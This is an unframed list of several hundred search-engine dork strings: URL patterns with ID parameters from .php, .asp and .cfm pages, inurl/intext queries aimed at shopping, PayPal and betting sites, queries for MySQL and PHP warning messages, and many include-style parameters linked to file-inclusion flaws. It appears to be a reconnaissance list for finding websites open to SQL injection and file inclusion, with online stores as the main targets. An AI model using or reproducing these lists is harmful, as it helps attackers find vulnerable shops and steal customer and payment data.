+article.php?id= +news_detail.asp?id= +projects/pview.php?id= +report-detail.asp?id= +article/index.php?id= +store.php?id= +artists/story/index.php?id= +franchise2.php?id= +article.php?id= +rentals.php?id= +worthies/details.php?id= +artists/index.php?id= +mylink.php?id= +resource.php?id= +category_id.php?id= +products.asp?ID= +detail.php?id= +lakeinfo.php?id= +business/details.php?id= +news/details.php?id= +list.php?id= +en/visit.php?id= +product_details.asp?id= +store.php?id= +viewprofile.php?id= +lowell/restaurants.php?id= +en/details.php?id= +en/details.php?id= +rca/store/item.php?item= +Steamboat_Springs_Vacation_Rental.php?ID= +where/details.php?id= +htmlpage.php?id= +details.php?id= +details.php?id= +melbourne.php?id= +melbourne_details.php?id= +products.php?ID= +Stacks/storyprof.php?ID= +artists.php?id= +board/showthread.php?t= +workshopview.php?id= +workshopview.php?id= +artists/details.php?id= +displayArticle.php?id= +event.php?id= +services_details_description.php?id= +product.asp?id= +WhitsundaySailing.php?id= +nl/default.asp?id= +directory/listing_coupons.php?id= +exhibitions/details.php?id= +details.php?id= +page.php?id= +cheats/details.php?ID= +media_display.php?id= +********.php?id= +articles.php?id= +index.php?id= +video.php?id= +news-details.php?id= +details.php?id= +press2.php?ID= +products/treedirectory.asp?id= +events/details.php?id= +calendar/event.php?id= +page.php?id= +ficha.php?id= +links/browse.php?id= +wwdsemea/default.asp?ID= +forum/showthread.php?t= +media.php?id= +review.php?id= +store/item.php?id= + +asp +ßæÏ: + +about.asp?cartID= +accinfo.asp?cartId= +acclogin.asp?cartID= +add.asp?bookid= +add_cart.asp?num= +addcart.asp? +addItem.asp +add-to-cart.asp?ID= +addToCart.asp?idProduct= +addtomylist.asp?ProdId= +adminEditProductFields.asp?intProdID= +advSearch_h.asp?idCategory= +affiliate.asp?ID= +affiliate-agreement.cfm?storeid= +affiliates.asp?id= +ancillary.asp?ID= +archive.asp?id= +article.asp?id= +aspx?PageID +basket.asp?id= +Book.asp?bookID= +book_list.asp?bookid= +book_view.asp?bookid= +BookDetails.asp?ID= +browse.asp?catid= +browse_item_details.asp +Browse_Item_Details.asp?Store_Id= +buy.asp? +buy.asp?bookid= +bycategory.asp?id= +cardinfo.asp?card= +cart.asp?action= +cart.asp?cart_id= +cart.asp?id= +cart_additem.asp?id= +cart_validate.asp?id= +cartadd.asp?id= +cat.asp?iCat= +catalog.asp +catalog.asp?CatalogID= +catalog_item.asp?ID= +catalog_main.asp?catid= +category.asp +category.asp?catid= +category_list.asp?id= +categorydisplay.asp?catid= +checkout.asp?cartid= +checkout.asp?UserID= +checkout_confirmed.asp?order_id= +checkout1.asp?cartid= +comersus_listCategoriesAndProducts.asp?idCategory= +comersus_optEmailToFriendForm.asp?idProduct= +comersus_optReviewReadExec.asp?idProduct= +comersus_viewItem.asp?idProduct= +comments_form.asp?ID= +contact.asp?cartId= +content.asp?id= +customerService.asp?****ID1= +default.asp?catID= +description.asp?bookid= +details.asp?BookID= +details.asp?Press_Release_ID= +details.asp?Product_ID= +details.asp?Service_ID= +display_item.asp?id= +displayproducts.asp +downloadTrial.asp?intProdID= +emailproduct.asp?itemid= +emailToFriend.asp?idProduct= +events.asp?ID= +faq.asp?cartID= +faq_list.asp?id= +faqs.asp?id= +feedback.asp?title= +freedownload.asp?bookid= +fullDisplay.asp?item= +getbook.asp?bookid= +GetItems.asp?itemid= +giftDetail.asp?id= +help.asp?CartId= +home.asp?id= +index.asp?cart= +index.asp?cartID= +index.asp?ID= +info.asp?ID= +item.asp?eid= +item.asp?item_id= +item.asp?itemid= +item.asp?model= +item.asp?prodtype= +item.asp?shopcd= +item_details.asp?catid= +item_list.asp?maingroup +item_show.asp?code_no= +itemDesc.asp?CartId= +itemdetail.asp?item= +itemdetails.asp?catalogid= +learnmore.asp?cartID= +links.asp?catid= +list.asp?bookid= +List.asp?CatID= + +listcategoriesandproducts.asp?idCategory= +modline.asp?id= +myaccount.asp?catid= +news.asp?id= +order.asp?BookID= +order.asp?id= +order.asp?item_ID= +OrderForm.asp?Cart= +page.asp?PartID= +payment.asp?CartID= +pdetail.asp?item_id= +powersearch.asp?CartId= +price.asp +privacy.asp?cartID= +prodbycat.asp?intCatalogID= +prodetails.asp?prodid= +prodlist.asp?catid= +product.asp?bookID= +product.asp?intProdID= +product_info.asp?item_id= +productDetails.asp?idProduct= +productDisplay.asp +productinfo.asp?item= +productlist.asp?ViewType=Category&CategoryID= +productpage.asp +products.asp?ID= +products.asp?keyword= +products_category.asp?CategoryID= +products_detail.asp?CategoryID= +productsByCategory.asp?intCatalogID= +prodView.asp?idProduct= +promo.asp?id= +promotion.asp?catid= +pview.asp?Item= +resellers.asp?idCategory= +results.asp?cat= +savecart.asp?CartId= +search.asp?CartID= +searchcat.asp?search_id= +Select_Item.asp?id= +Services.asp?ID= +shippinginfo.asp?CartId= +shop.asp?a= +shop.asp?action= +shop.asp?bookid= +shop.asp?cartID= +shop_details.asp?prodid= +shopaddtocart.asp +shopaddtocart.asp?catalogid= +shopbasket.asp?bookid= +shopbycategory.asp?catid= +shopcart.asp?title= +shopcreatorder.asp +shopcurrency.asp?cid= +shopdc.asp?bookid= +shopdisplaycategories.asp +shopdisplayproduct.asp?catalogid= +shopdisplayproducts.asp +shopexd.asp +shopexd.asp?catalogid= +shopping_basket.asp?cartID= +shopprojectlogin.asp +shopquery.asp?catalogid= +shopremoveitem.asp?cartid= +shopreviewadd.asp?id= +shopreviewlist.asp?id= +ShopSearch.asp?CategoryID= +shoptellafriend.asp?id= +shopthanks.asp +shopwelcome.asp?title= +show_item.asp?id= +show_item_details.asp?item_id= +showbook.asp?bookid= +showStore.asp?catID= +shprodde.asp?SKU= +specials.asp?id= +store.asp?id= +store_bycat.asp?id= +store_listing.asp?id= +Store_ViewProducts.asp?Cat= +store-details.asp?id= +storefront.asp?id= +storefronts.asp?title= +storeitem.asp?item= +StoreRedirect.asp?ID= +subcategories.asp?id= +tek9.asp? +template.asp?Action=Item&pid= +topic.asp?ID= +tuangou.asp?bookid= +type.asp?iType= +updatebasket.asp?bookid= +updates.asp?ID= +view.asp?cid= +view_cart.asp?title= +view_detail.asp?ID= +viewcart.asp?CartId= +viewCart.asp?userID= +viewCat_h.asp?idCategory= +viewevent.asp?EventID= +viewitem.asp?recor= +viewPrd.asp?idcategory= +ViewProduct.asp?misc= +voteList.asp?item_ID= +whatsnew.asp?idCategory= +WsAncillary.asp?ID= +WsPages.asp?ID=noticiasDetalle.asp?xid= +sitio/item.asp?idcd= +index.asp?site= +de/content.asp?page_id= +gallerysort.asp?iid= +products.asp?type= +event.asp?id= +showfeature.asp?id= +home.asp?ID= +tas/event.asp?id= +profile.asp?id= +details.asp?id= +past-event.asp?id= +index.asp?action= +site/products.asp?prodid= +page.asp?pId= +resources/vulnerabilities_list.asp?id= +site.asp?id= +products/index.asp?rangeid= +global_projects.asp?cid= +publications/view.asp?id= +display_page.asp?id= +pages.asp?ID= +lmsrecords_cd.asp?cdid= +product.asp?prd= +cat/?catid= +products/product-list.asp?id= +debate-detail.asp?id= +cbmer/congres/page.asp?LAN= +content.asp?id= +news.asp?ID= +photogallery.asp?id= +index.asp?id= +product/product.asp?product_no= +nyheder.htm?show= +book.asp?ID= +print.asp?id= +detail.asp?id= +book.asp?id= +content.asp?PID= +more_detail.asp?id= +content.asp?id= +view_items.asp?id= +view_author.asp?id= +main.asp?id= +english/fonction/print.asp?id= +magazines/adult_magazine_single_page.asp?magid= +product_details.asp?prodid= +magazines/adult_magazine_full_year.asp?magid= +products/card.asp?prodID= +catalog/product.asp?cat_id= +e_board/modifyform.html?code= +community/calendar-event-fr.asp?id= +products.asp?p= +news.asp?id= +view/7/9628/1.html?reply= +product_details.asp?prodid= +catalog/product.asp?pid= +rating.asp?id= +?page= +catalog/main.asp?cat_id= +index.asp?page= +detail.asp?prodid= +products/product.asp?pid= +news.asp?id= +book_detail.asp?BookID= +catalog/main.asp?cat_id= +catalog/main.asp?cat_id= +default.asp?cPath= +catalog/main.asp?cat_id= +catalog/main.asp?cat_id= +category.asp?catid= +categories.asp?cat= +categories.asp?cat= +detail.asp?prodID= +detail.asp?id= +category.asp?id= +hm/inside.asp?id= +index.asp?area_id= +gallery.asp?id= +products.asp?cat= +products.asp?cat= +media/pr.asp?id= +books/book.asp?proj_nr= +products/card.asp?prodID= +general.asp?id= +news.asp?t= +usb/devices/showdev.asp?id= +content/detail.asp?id= +templet.asp?acticle_id= +news/news/title_show.asp?id= +product.asp?id= +index.asp?url= +cryolab/content.asp?cid= +ls.asp?id= +s.asp?w= +abroad/page.asp?cid= +bayer/dtnews.asp?id= +news/temp.asp?id= +index.asp?url= +book/bookcover.asp?bookid= +index.asp/en/component/pvm/?view= +product/list.asp?pid= +cats.asp?cat= +software_categories.asp?cat_id= +print.asp?sid= +docDetail.aspx?chnum= +index.asp?section= +index.asp?page= +index.asp?page= +en/publications.asp?id= +events/detail.asp?ID= +forum/profile.asp?id= +media/pr.asp?id= +content.asp?ID= +cloudbank/detail.asp?ID= +pages.asp?id= +news.asp?id= +beitrag_D.asp?id= +content/index.asp?id= +index.asp?i= +?action= +index.asp?page= +beitrag_F.asp?id= +index.asp?pageid= +page.asp?modul= +detail.asp?id= +index.asp?w= +index.asp?modus= +news.asp?id= +news.asp?id= +aktuelles/meldungen-detail.asp?id= +item.asp?id= +obio/detail.asp?id= +page/de/produkte/produkte.asp?prodID= +packages_display.asp?ref= +shop/index.asp?cPath= +modules.asp?bookid= +product-range.asp?rangeID= +en/news/fullnews.asp?newsid= +deal_coupon.asp?cat_id= +show.asp?id= +blog/index.asp?idBlog= +redaktion/whiteteeth/detail.asp?nr= +HistoryStore/pages/item.asp?itemID= +aktuelles/veranstaltungen/detail.asp?id= +tecdaten/showdetail.asp?prodid= +?id= +rating/stat.asp?id= +content.asp?id= +viewapp.asp?id= +item.asp?id= +news/newsitem.asp?newsID= +FernandFaerie/index.asp?c= +show.asp?id= +?cat= +categories.asp?cat= +category.asp?c= + +product_info.asp?id= +prod.asp?cat= +store/product.asp?productid= +browsepr.asp?pr= +product-list.asp?cid= +products.asp?cat_id= +product.asp?ItemID= +category.asp?c= +main.asp?id= +article.asp?id= +showproduct.asp?productId= +view_item.asp?item= +skunkworks/content.asp?id= +index.asp?id= +item_show.asp?id= +publications.asp?Id= +index.asp?t= +view_items.asp?id= +portafolio/portafolio.asp?id= +YZboard/view.asp?id= +index_en.asp?ref= +index_en.asp?ref= +category.asp?id_category= +main.asp?id= +main.asp?id= +calendar/event.asp?id= +default.asp?cPath= +pages/print.asp?id= +index.asp?pg_t= +_news/news.asp?id= +forum/showProfile.asp?id= +fr/commande-liste-categorie.asp?panier= +downloads/shambler.asp?id= +sinformer/n/imprimer.asp?id= +More_Details.asp?id= +directory/contenu.asp?id_cat= +properties.asp?id_cat= +forum/showProfile.asp?id= +downloads/category.asp?c= +index.asp?cat= +product_info.asp?products_id= +product_info.asp?products_id= +product-list.asp?category_id= +detail.asp?siteid= +projects/event.asp?id= +view_items.asp?id= +more_details.asp?id= +melbourne_details.asp?id= +more_details.asp?id= +detail.asp?id= +more_details.asp?id= +home.asp?cat= +idlechat/message.asp?id= +detail.asp?id= +print.asp?sid= +more_details.asp?id= +default.asp?cPath= +events/event.asp?id= +brand.asp?id= +toynbeestudios/content.asp?id= +show-book.asp?id= +more_details.asp?id= +store/default.asp?cPath= +property.asp?id= +product_details.asp?id= +more_details.asp?id= +view-event.asp?id= +content.asp?id= +book.asp?id= +page/venue.asp?id= +print.asp?sid= +colourpointeducational/more_details.asp?id= +print.asp?sid= +browse/book.asp?journalID= +section.asp?section= +bookDetails.asp?id= +profiles/profile.asp?profileid= +event.asp?id= +gallery.asp?id= +category.asp?CID= +corporate/newsreleases_more.asp?id= +print.asp?id= +view_items.asp?id= +more_details.asp?id= +county-facts/diary/vcsgen.asp?id= +idlechat/message.asp?id= +podcast/item.asp?pid= +products.asp?act= +details.asp?prodId= +socsci/events/full_details.asp?id= +ourblog.asp?categoryid= +mall/more.asp?ProdID= +archive/get.asp?message_id= +review/review_form.asp?item_id= +english/publicproducts.asp?groupid= +news_and_notices.asp?news_id= +rounds-detail.asp?id= +gig.asp?id= +board/view.asp?no= +index.asp?modus= +news_item.asp?id= +rss.asp?cat= +products/product.asp?id= +details.asp?ProdID= +els_/product/product.asp?id= +store/description.asp?iddesc= +socsci/news_items/full_story.asp?id= +modules/forum/index.asp?topic_id= +feature.asp?id= +products/Blitzball.htm?id= +profile_print.asp?id= +questions.asp?questionid= +html/scoutnew.asp?prodid= +main/index.asp?action= +********.asp?cid= +********.asp?cid= +news.asp?type= +index.asp?page= +viewthread.asp?tid= +summary.asp?PID= +news/latest_news.asp?cat_id= +index.asp?cPath= +category.asp?CID= +index.asp?pid= +more_details.asp?id= +specials.asp?osCsid= +search/display.asp?BookID= +articles.asp?id= +print.asp?sid= +page.asp?id= +more_details.asp?id= +newsite/pdf_show.asp?id= +shop/category.asp?cat_id= +shopcafe-shop-product.asp?bookId= +shop/books_detail.asp?bookID= +index.asp?cPath= +more_details.asp?id= +news.asp?id= +more_details.asp?id= +shop/books_detail.asp?bookID= +more_details.asp?id= +blog.asp?blog= +index.asp?pid= +prodotti.asp?id_cat= +category.asp?CID= +more_details.asp?id= +poem_list.asp?bookID= +more_details.asp?id= +content.asp?categoryId= +authorDetails.asp?bookID= +press_release.asp?id= +item_list.asp?cat_id= +colourpointeducational/more_details.asp?id= +index.asp?pid= +download.asp?id= +shop/category.asp?cat_id= +i-know/content.asp?page= +store/index.asp?cat_id= +yacht_search/yacht_view.asp?pid= +pharmaxim/category.asp?cid= +print.asp?sid= +specials.asp?osCsid= +store.asp?cat_id= +category.asp?cid= +displayrange.asp?rangeid= +product.asp?id= +csc/news-details.asp?cat= +products-display-details.asp?prodid= +stockists_list.asp?area_id= +news/newsitem.asp?newsID= +index.asp?pid= +newsitem.asp?newsid= +category.asp?id= +news/newsitem.asp?newsID= +details.asp?prodId= +publications/publication.asp?id= +purelydiamond/products/category.asp?cat= +category.asp?cid= +product/detail.asp?id= +news/newsitem.asp?newsID= +details.asp?prodID= +item.asp?item_id= +edition.asp?area_id= +page.asp?area_id= +view_newsletter.asp?id= +library.asp?cat= +categories.asp?cat= +page.asp?area_id= +categories.asp?cat= +publications.asp?id= +item.asp?sub_id= +page.asp?area_id= +page.asp?area_id= +category.asp?catid= +content.asp?cID= +newsitem.asp?newsid= +frontend/category.asp?id_category= +news/newsitem.asp?newsID= +things-to-do/detail.asp?id= +page.asp?area_id= +page.asp?area_id= +listing.asp?cat= +item.asp?iid= +customer/home.asp?cat= +staff/publications.asp?sn= +news/newsitem.asp?newsID= +library.asp?cat= +main/index.asp?uid= +library.asp?cat= +shop/eventshop/product_detail.asp?itemid= +news/newsitem.asp?newsID= +news/newsitem.asp?newsID= +library.asp?cat= +FullStory.asp?Id= +publications.asp?ID= +publications/book_reviews/full_review.asp?id= +newsitem.asp?newsID= +newsItem.asp?newsId= +site/en/list_service.asp?cat= +page.asp?area_id= +product.asp?ProductID= +releases_headlines_details.asp?id= +product.asp?shopprodid= +product.asp?productid= +product.asp?product= +product.asp?product_id= +productlist.asp?id= +product.asp?shopprodid= +garden_equipment/pest-weed-control/product.asp?pr= +product.asp?shopprodid= +browsepr.asp?pr= +productlist.asp?id= +kshop/product.asp?productid= +product.asp?pid= +showproduct.asp?prodid= +product.asp?productid= +productlist.asp?id= +index.asp?pageId= +productlist.asp?tid= +product-list.asp?id= +onlinesales/product.asp?product_id= +garden_equipment/Fruit-Cage/product.asp?pr= +product.asp?shopprodid= +product_info.asp?products_id= +productlist.asp?tid= +showsub.asp?id= +productlist.asp?fid= +products.asp?cat= +products.asp?cat= +product-list.asp?id= +product.asp?sku= +store/product.asp?productid= +products.asp?cat= +productList.asp?cat= +product_detail.asp?product_id= +product.asp?pid= +wiki/pmwiki.asp?page****= +summary.asp?PID= +productlist.asp?grpid= +cart/product.asp?productid= +db/CART/product_details.asp?product_id= +ProductList.asp?id= +products/product.asp?id= +product.asp?shopprodid= +product_info.asp?products_id= +product_ranges_view.asp?ID= +cei/cedb/projdetail.asp?projID= +products.asp?DepartmentID= +product.asp?shopprodid= +product.asp?shopprodid= +product_info.asp?products_id= +index.asp?news= +education/content.asp?page= +Interior/productlist.asp?id= +products.asp?categoryID= +modules.asp?****= +message/comment_threads.asp?postID= +artist_art.asp?id= +products.asp?cat= +index.asp?option= +ov_tv.asp?item= +index.asp?lang= +showproduct.asp?cat= +index.asp?lang= +product.asp?bid= +product.asp?bid= +cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId= +item_show.asp?lid= +?pagerequested= +downloads.asp?id= +print.asp?sid= +print.asp?sid= +product.asp?intProductID= +productList.asp?id= +product.asp?intProductID= +more_details.asp?id= +more_details.asp?id= +books.asp?id= +index.asp?offs= +mboard/replies.asp?parent_id= +Computer Science.asp?id= +news.asp?id= +pdf_post.asp?ID= +reviews.asp?id= +art.asp?id= +prod.asp?cat= +event_info.asp?p= +view_items.asp?id= +home.asp?cat= +item_book.asp?CAT= +www/index.asp?page= +schule/termine.asp?view= +goods_detail.asp?data= +storemanager/contents/item.asp?page_code= +view_items.asp?id= +customer/board.htm?mode= +help/com_view.html?code= +n_replyboard.asp?typeboard= +eng_board/view.asp?T****= +prev_results.asp?prodID= +bbs/view.asp?no= +gnu/?doc= +zb/view.asp?uid= +global/product/product.asp?gubun= +inurl:”.php?cat=”+intext:”Paypal”+site:UK + +inurl:”.php?cat=”+intext:”/Buy Now/”+site:.net + +inurl:”.php?cid=”+intext:”online+betting” + +inurl:”.php?id=” intext:”View cart” + +inurl:”.php?id=” intext:”Buy Now” + +inurl:”.php?id=” intext:”add to cart” + +inurl:”.php?id=” intext:”shopping” + +inurl:”.php?id=” intext:”boutique” + +inurl:”.php?id=” intext:”/store/” + +inurl:”.php?id=” intext:”/shop/” + +inurl:”.php?id=” intext:”toys” + +inurl:”.php?cid=” + +inurl:”.php?cid=” intext:”shopping” + +inurl:”.php?cid=” intext:”add to cart” + +inurl:”.php?cid=” intext:”Buy Now” + +inurl:”.php?cid=” intext:”View cart” + +inurl:”.php?cid=” intext:”boutique + +inurl:”.php?cid=” intext:”/store/” + +inurl:”.php?cid=” intext:”/shop/” + +inurl:”.php?cid=” intext:”Toys” + +inurl:”.php?cat=” + +inurl:”.php?cat=” intext:”shopping” + +inurl:”.php?cat=” intext:”add to cart” + +inurl:”.php?cat=” intext:”Buy Now” + +inurl:”.php?cat=” intext:”View cart” + +inurl:”.php?cat=” intext:”boutique + +” inurl:”.php?cat=” intext:”/store/” + +inurl:”.php?cat=” intext:”/shop/” + +inurl:”.php?cat=” intext:”Toys” + +inurl:”.php?catid=” + +inurl:”.php?catid=” intext:”View cart” + +inurl:”.php?catid=” intext:”Buy Now” + +inurl:”.php?catid=” intext:”add to cart” + +inurl:”.php?catid=” intext:”shopping” + +inurl:”.php?catid=” intext:”boutique” + +inurl:”.php?catid=” intext:”/store/” + +inurl:”.php?catid=” intext:”/shop/” + +inurl:”.php?catid=” intext:”Toys” + +inurl:”.php?categoryid=” + +inurl:”.php?categoryid=” intext:”View cart” + +inurl:”.php?categoryid=” intext:”Buy Now” + +inurl:”.php?categoryid=” intext:”add to cart” + +inurl:”.php?categoryid=” intext:”shopping” + +inurl:”.php?categoryid=” intext:”boutique” + +inurl:”.php?categoryid=” intext:”/store/” + +inurl:”.php?categoryid=” intext:”/shop/” + +inurl:”.php?categoryid=” intext:”Toys” + +inurl:”.php?pid=” + +inurl:”.php?pid=” intext:”shopping” + +inurl:”.php?pid=” intext:”add to cart” + +inurl:”.php?pid=” intext:”Buy Now” + +inurl:”.php?pid=” intext:”View cart” + +inurl:”.php?pid=” intext:”boutique” + +cat.asp?cat= +productlist.asp?catalogid= + +Category.asp?category_id= + +Category.cfm?category_id= + +category.asp?cid= + +category.cfm?cid= + +category.asp?cat= + +category.cfm?cat= + +category.asp?id= + +index.cfm?pageid= + +category.asp?catid= + +Category.asp?c= + +Category.cfm?c= + +productlist.cfm?catalogid= + +productlist.asp?catalogid= + +viewitem.asp?catalogid= + +viewitem.cfm?catalogid= + +catalog.cfm?catalogId= + +catalog.asp?catalogId= + +department.cfm?dept= + +department.asp?dept= + +itemdetails.cfm?catalogId= + +itemdetails.asp?catalogId= + +product_detail.asp?catalogid= + +product_detail.cfm?catalogid= + +product_list.asp?catalogid= + +product_list.cfm?catalogid= + +ShowProduct.cfm?CatID= + +ShowProduct.asp?CatID= + +search_results.cfm?txtsearchParamCat= + +search_results.asp?txtsearchParamCat= + +itemdetails.cfm?catalogId= + +itemdetails.asp?catalogId= + +store-page.cfm?go= + +store-page.asp?go= + +Detail.cfm?CatalogID= + +Detail.asp?CatalogID= + +browse.cfm?category_id= + +view.cfm?category_id= + +products.cfm?category_id= + +index.cfm?Category_ID= + +detail.cfm?id= + +category.cfm?id= + +showitems.cfm?category_id= + +ViewProduct.asp?PID= + +ViewProduct.cfm?PID= + +shopdisplayproducts.asp?catalogid= + +shopdisplayproducts.cfn?catalogid= + +displayproducts.cfm?category_id= + +displayproducts.asp?category_id= + +DisplayProducts.asp?prodcat= + +DisplayProducts.cfm?prodcat=x + +productDetail.cfm?ProductID= + +products.php?subcat_id= + +showitem.cfm?id=21 + +productdetail.cfm?pid= + +default.cfm?action=46 + +products_accessories.asp?CatId= + +Store_ViewProducts.asp?Cat= + +category.cfm?categoryID= + +category.asp?category= + +tepeecart.cfm?shopid= + +view_product.asp?productID= + +ProductDetails.asp?prdId=12 + +products.cfm?ID= + +detail.asp?product_id= + +product_detail.asp?product_id= + +products.php?subcat_id= + +product.php?product_id= + +view_product.cfm?productID= + +product_details.asp?prodid= + +shopdisplayproducts.cfm?id= + +displayproducts.cfm?id= +trainers.php?id= +play_old.php?id= +declaration_more.php?decl_id= +Pageid= +games.php?id= +newsDetail.php?id= +staff_id= +historialeer.php?num= +product-item.php?id= +news_view.php?id= +humor.php?id= +communique_detail.php?id= +sem.php3?id= +opinions.php?id= +spr.php?id= +pages.php?id= +chappies.php?id= +prod_detail.php?id= +viewphoto.php?id= +view.php?id= +website.php?id= +hosting_info.php?id= +gery.php?id= +detail.php?ID= +publications.php?id= +Productinfo.php?id= +releases.php?id= +ray.php?id= +produit.php?id= +pop.php?id= +shopping.php?id= +productdetail.php?id= +post.php?id= +section.php?id= +theme.php?id= +page.php?id= +shredder-categories.php?id= +product_ranges_view.php?ID= +shop_category.php?id= +channel_id= +newsid= +news_display.php?getid= +ages.php?id= +clanek.php4?id= +review.php?id= +iniziativa.php?in= +curriculum.php?id= +labels.php?id= +look.php?ID= +galeri_info.php?l= +tekst.php?idt= +newscat.php?id= +newsticker_info.php?idn= +rubrika.php?idr= +offer.php?idf= +“id=” & intext:”Warning: mysql_fetch_array() +“id=” & intext:”Warning: getimagesize() +“id=” & intext:”Warning: session_start() +“id=” & intext:”Warning: mysql_num_rows() +“id=” & intext:”Warning: mysql_query() +“id=” & intext:”Warning: array_merge() +“id=” & intext:”Warning: preg_match() +“id=” & intext:”Warning: ilesize() +“id=” & intext:”Warning: filesize() +index.php?id= +buy.php?category= +article.php?ID= +play_old.php?id= +newsitem.php?num= +top10.php?cat= +historialeer.php?num= +reagir.php?num= +Stray-Questions-View.php?num= +forum_bds.php?num= +game.php?id= +view_product.php?id= +sw_comment.php?id= +news.php?id= +avd_start.php?avd= +event.php?id= +sql.php?id= +news_view.php?id= +select_biblio.php?id= +humor.php?id= +ogl_inet.php?ogl_id= +fiche_spectacle.php?id= +communique_detail.php?id= +sem.php3?id= +kategorie.php4?id= +faq2.php?id= +show_an.php?id= +preview.php?id= +loadpsb.php?id= +opinions.php?id= +spr.php?id= +announce.php?id= +participant.php?id= +download.php?id= +main.php?id= +review.php?id= +chappies.php?id= +read.php?id= +prod_detail.php?id= +article.php?id= +person.php?id= +productinfo.php?id= +showimg.php?id= +view.php?id= +website.php?id= +hosting_info.php?id= +gery.php?id= +rub.php?idr= +view_faq.php?id= +artikelinfo.php?id= +detail.php?ID= +index.php?= +profile_view.php?id= +category.php?id= +publications.php?id= +fellows.php?id= +downloads_info.php?id= +prod_info.php?id= +shop.php?do=part&id= +collectionitem.php?id= +band_info.php?id= +product.php?id= +releases.php?id= +ray.php?id= +produit.php?id= +pop.php?id= +shopping.php?id= +productdetail.php?id= +post.php?id= +viewshowdetail.php?id= +clubpage.php?id= +memberInfo.php?id= +section.php?id= +theme.php?id= +page.php?id= +shredder-categories.php?id= +tradeCategory.php?id= +product_ranges_view.php?ID= +shop_category.php?id= +transcript.php?id= +channel_id= +item_id= +newsid= +trainers.php?id= +news-full.php?id= +news_display.php?getid= +index2.php?option= +readnews.php?id= +newsone.php?id= +product-item.php?id= +pages.php?id= +clanek.php4?id= +viewapp.php?id= + +viewphoto.php?id= +galeri_info.php?l= +iniziativa.php?in= +curriculum.php?id= +labels.php?id= +story.php?id= +look.php?ID= +aboutbook.php?id= +“id=” & intext:”Warning: mysql_fetch_assoc() +“id=” & intext:”Warning: is_writable() +“id=” & intext:”Warning: Unknown() +“id=” & intext:”Warning: mysql_result() +“id=” & intext:”Warning: pg_exec() +“id=” & intext:”Warning: require() +buy.php?category= +pageid= +page.php?file= +show.php?id= +newsitem.php?num= +readnews.php?id= +top10.php?cat= +reagir.php?num= +Stray-Questions-View.php?num= +forum_bds.php?num= +game.php?id= +view_product.php?id= +sw_comment.php?id= +news.php?id= +avd_start.php?avd= +event.php?id= +sql.php?id= +select_biblio.php?id= +ogl_inet.php?ogl_id= +fiche_spectacle.php?id= +kategorie.php4?id= +faq2.php?id= +show_an.php?id= +loadpsb.php?id= +announce.php?id= +participant.php?id= +download.php?id= +article.php?id= +person.php?id= +productinfo.php?id= +showimg.php?id= +rub.php?idr= +view_faq.php?id= +artikelinfo.php?id= +index.php?= +profile_view.php?id= +category.php?id= +fellows.php?id= +downloads_info.php?id= +prod_info.php?id= +shop.php?do=part&id= +collectionitem.php?id= +band_info.php?id= +product.php?id= +viewshowdetail.php?id= +clubpage.php?id= +memberInfo.php?id= +tradeCategory.php?id= +transcript.php?id= +item_id= +news-full.php?id= +aboutbook.php?id= +preview.php?id= +material.php?id= +read.php?id= +viewapp.php?id= +story.php?id= +newsone.php?id= +rubp.php?idr= +art.php?idm= +title.php?id= +index1.php?modo= +include.php?*[*]*= +nota.php?pollname= +index3.php?p= +padrao.php?pre= +home.php?pa= +main.php?type= +sitio.php?start= +*.php?include= +general.php?xlink= +show.php?go= +nota.php?ki= +down*.php?oldal= +layout.php?disp= +enter.php?chapter= +base.php?incl= +enter.php?mod= +show.php?corpo= +head.php?*[*]*= +info.php?strona= +template.php?str= +main.php?doshow= +view.php?*[*]*= +index.php?to= +page.php?cmd= +view.php?b= +info.php?option= +show.php?x= +template.php?texto= +index3.php?ir= +print.php?chapter= +file.php?inc= +file.php?cont= +view.php?cmd= +include.php?chapter= +path.php?my= +principal.php?param= +general.php?menue= +index1.php?b= +info.php?chapter= +nota.php?chapter= +general.php?include= +start.php?addr= +index1.php?qry= +index1.php?loc= +page.php?addr= +index1.php?dir= +principal.php?pr= +press.php?seite= +head.php?cmd= +home.php?sec= +home.php?category= +standard.php?cmd= +mod*.php?thispage= +base.php?to= +view.php?choix= +base.php?panel= +template.php?mod= +info.php?j= +blank.php?pref= +sub*.php?channel= +standard.php?in= +general.php?cmd= +pagina.php?panel= +template.php?where= +path.php?channel= +gery.php?seccion= +page.php?tipo= +sitio.php?rub= +pagina.php?u= +file.php?ir= +*inc*.php?sivu= +path.php?start= +page.php?chapter= +home.php?recipe= +enter.php?pname= +layout.php?path= +print.php?open= +mod*.php?channel= +down*.php?phpbb_root_path= +*inc*.php?str= +gery.php?phpbb_root_path= +include.php?middlePart= +sub*.php?destino= +info.php?read= +home.php?sp= +main.php?strona= +sitio.php?get= +sitio.php?index= +index3.php?option= +enter.php?a= +main.php?second= +print.php?pname= +blank.php?itemnav= +blank.php?pagina= +index1.php?d= +down*.php?where= +*inc*.php?include= +path.php?pre= +home.php?loader= +start.php?eval= +index.php?disp= +head.php?mod= +sitio.php?section= +nota.php?doshow= +home.php?seite= +home.php?a= +page.php?url= +pagina.php?left= +layout.php?c= +principal.php?goto= +standard.php?base_dir= +home.php?where= +page.php?sivu= +*inc*.php?adresa= +padrao.php?str= +include.php?my= +show.php?home= +index.php?load= +index3.php?rub= +sub*.php?str= +start.php?index= +nota.php?mod= +sub*.php?mid= +index1.php?*[*]*= +pagina.php?oldal= +padrao.php?loc= +padrao.php?rub= +page.php?incl= +gery.php?disp= +nota.php?oldal= +include.php?u= +principal.php?pagina= +print.php?choix= +head.php?filepath= +include.php?corpo= +sub*.php?action= +head.php?pname= +press.php?dir= +show.php?xlink= +file.php?left= +nota.php?destino= +general.php?module= +index3.php?redirect= +down*.php?param= +default.php?ki= +padrao.php?h= +padrao.php?read= +mod*.php?cont= + +index1.php?l= +down*.php?pr= +gery.php?viewpage= +template.php?load= +nota.php?pr= +padrao.php?destino= +index2.php?channel= +principal.php?opcion= +start.php?str= +press.php?*[*]*= +index.php?ev= +pagina.php?pre= +nota.php?content= +include.php?adresa= +sitio.php?t= +index.php?sivu= +principal.php?q= +path.php?ev= +print.php?module= +index.php?loc= +nota.php?basepath= +padrao.php?tipo= +index2.php?in= +principal.php?eval= +file.php?qry= +info.php?t= +enter.php?play= +general.php?var= +principal.php?s= +standard.php?pagina= +standard.php?subject= +base.php?second= +head.php?inc= +pagina.php?basepath= +main.php?pname= +*inc*.php?modo= +include.php?goto= +file.php?pg= +head.php?g= +general.php?header= +start.php?*root*= +enter.php?pref= +index3.php?open= +start.php?module= +main.php?load= +enter.php?pg= +padrao.php?redirect= +pagina.php?my= +gery.php?pre= +enter.php?w= +info.php?texto= 